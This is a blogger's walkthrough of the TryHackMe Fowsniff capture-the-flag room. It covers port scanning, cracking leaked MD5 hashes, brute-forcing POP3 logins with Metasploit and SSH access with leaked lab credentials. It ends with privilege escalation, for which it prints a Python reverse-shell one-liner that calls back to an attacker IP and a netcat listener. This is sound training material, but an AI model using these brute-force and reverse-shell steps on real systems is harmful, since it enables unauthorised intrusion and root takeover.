TryHackMe: Fowsniff CTF

6 min readJul 10, 2021


Difficulty: Easy

Hi all, this is TheF1ash, and this is my first Medium post on a CTF room from TryHackMe, Fowsniff CTF(
This is a boot2root machine where we can deploy the machine and try to gain access to the machine by exploiting vulnerabilities. Our ultimate goal is to get access to the machine as the user with the maximum privileges, in short, as root in Linux. So, lets begin!

I have a TryHackMe subscription, so I get access to the in-browser AttackBox that TryHackMe provides. If we are using the Attackbox, we will not need to connect to the TryHackMe VPN. We can do all our hacking in the browser! I will be using that attackbox as my attacking machine.

On deploying the machine in the room, I get the following IP address for the machine:


So lets try to find out what ports and services are open using nmap . The command I use generally for nmap is nmap -sV -vv <machine_ip> . This is not extensive, but this is the one I use for a quick starting scan. If I feel I haven’t found enough, or to get more information, I can return to do another scan with some additional flags, but this should be enough to get us started.

So lets run that scan here: nmap -sV -vv and we see the following results:

Nmap scan results

As we can see, ports 80, 110 and 143 are the ports which seem to be open from the common ports. Port 80 is for HTTP, 110 is for POP3, 143 for IMAP.

Lets take a look at the website at .

Fowsniff Corp website

We see that in the page, it says the internal system of Fowsniff suffered a data breach and employee usernames and passwords might have been exposed. Attackers were also able to hijack the official @fowsniffcorp Twitter account, and sensitive information might be released by attackers via this account! Lets see if they already did :).

On checking @fowsniffcorp Twitter account, we see:

Fowsniff Corp Twitter account

It seems it has been pwned, as suspected. The attacker seems to have leaked the passwords as can be seen in the pinned tweet. Lets open the pastebin link to see the dump.

Going to we get the following password hashes dumped along with the email addresses:

Fowsniff Corporation Passwords LEAKED!
Here are their email passwords dumped from their databases.They left their pop3 server WIDE OPEN, too!MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

So as all those are password hashes hashed with MD5, we can try to crack them. However, before doing that, just wanted to point out this last tweet by the hijacked account of FowSniffCorp:

This indicates that the sysadmin has the following credentials:


Hash Cracking

Lets crack that hash using an online tool, CrackStation, at .

Hmm, it seems CrackStation could not crack the hash. Lets see if we can upload the hash list and whether we are able to crack the hashes:

CrackStation hash cracker

As we can see, CrackStation was able to crack all hashes except one, the one for the sysadmin.

Now lets try to see if we can brute force the pop3 login using metasploit, as asked in one of the questions in the room.
On opening msfconsole and doing search pop3 , we get the first option as auxiliary/scanner/pop3/pop3_login . Seems like we can brute force email logins using this module.
Lets use this module to brute force the login. First, select that module to use using use auxiliary/scanner/pop3/pop3_login . (Tip: we can also use the module # in the search results, 0 here, like use 0 to directly select the corresponding module number).

Now once we selected to use the module, we can show the options we need to set using show options .

Metasploit POP3 show options

As we can see, I have already set the options. It is required to set BRUTEFORCE_SPEED, RHOSTS(the machine we are attacking), RPORT(POP3 port), STOP_ON_SUCCESS, THREADS and VERBOSE. I set the USERPASS_FILE which contains the usernames and passwords we cracked in pairs, with each pair on a line, separated by space. (Note: I had to remove the @fowsniff part from the usernames to get a SUCCESS). Also, you can point USER_FILE and PASS_FILE to any empty files you want, otherwise it will use the default files which was taking longer in my case.
Once we have the options set, all we need to do is run the module usingrun .
It will brute force our username and password combinations.

POP3 Username and Password brute force results

As we can see, metasploit ran our username and password combinations agains the POP3 server. It came back with one success, it seems seina:scoobydoo2 worked.

Question: What was seina’s password to the email service?
Answer: scoobydoo2.

Let’s try to connect to the email service using Seina’s credentials.

To do this, I did a quick search on DuckDuckGo and found this site:
So we can do a telnet 110 to connect to the email server using telnet.
After that, we can issue the USER seina followed by PASS scoobydoo2 commands and we can see we are logged in.
Now we can do LIST to see the email message list which shows us the summary of messages with the number of the message and the byte size of the message.

We can do a RETR 1 to retrieve the 1st message. On doing that, we see it is from stone@fowsniff and it seems its sent to all other employees.

From the message we get the temporary SSH password:


Question: Looking through her emails, what was a temporary password set for her?
Answer: S1ck3nBluff+secureshell

Similarly, we can retrieve the 2nd email message, but in that we dont see anything much useful.

Now lets try to connect to the SSH login account using stone’s account with that password, as pointed out in the next question:

ssh stone@

It seems that this password doesnt work for stone or seina . Lets see if it works for baksteen , as the 2nd email was sent by them.

And it worked! we are logged in to the system as baksteen .

Privilege Escalation

Lets see which groups the user is part of. We can do that using the groups command. We can see that baksteen is a part of the users and baksteen groups. Lets see if there are any interesting files that can be executed by users of those groups.

We see an interesting file, /opt/cube/ . On checking the permissions, we see it is owned by users group, and we can write to that file. We can see that this file is run by root whenever the Message of The Day file at /etc/update-motd.d/00-header is run(whenever we ssh to the machine), so lets include a reverse shell code inside the file. We can use the python reverse shell provided by TryHackMe:

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[“/bin/sh”,”-i”]);’

We can replace <IP> with our attacking IP(in quotes), and 1234 with any port that we want to receive a reverse shell connection back on.

Now we can setup a netcat listener on our attacking machine where we will receive the reverse shell connection: nc -lvnp 4444

Once we have everything ready, we can connect to the machine using SSH again as baksteen .

And right after we login to the machine, we get a reverse shell connection back as root on the netcat listener!

Root access

And that completes the walkthrough! I enjoyed the room, and would post more future walkthroughs for TryHackMe rooms in the future.




No responses yet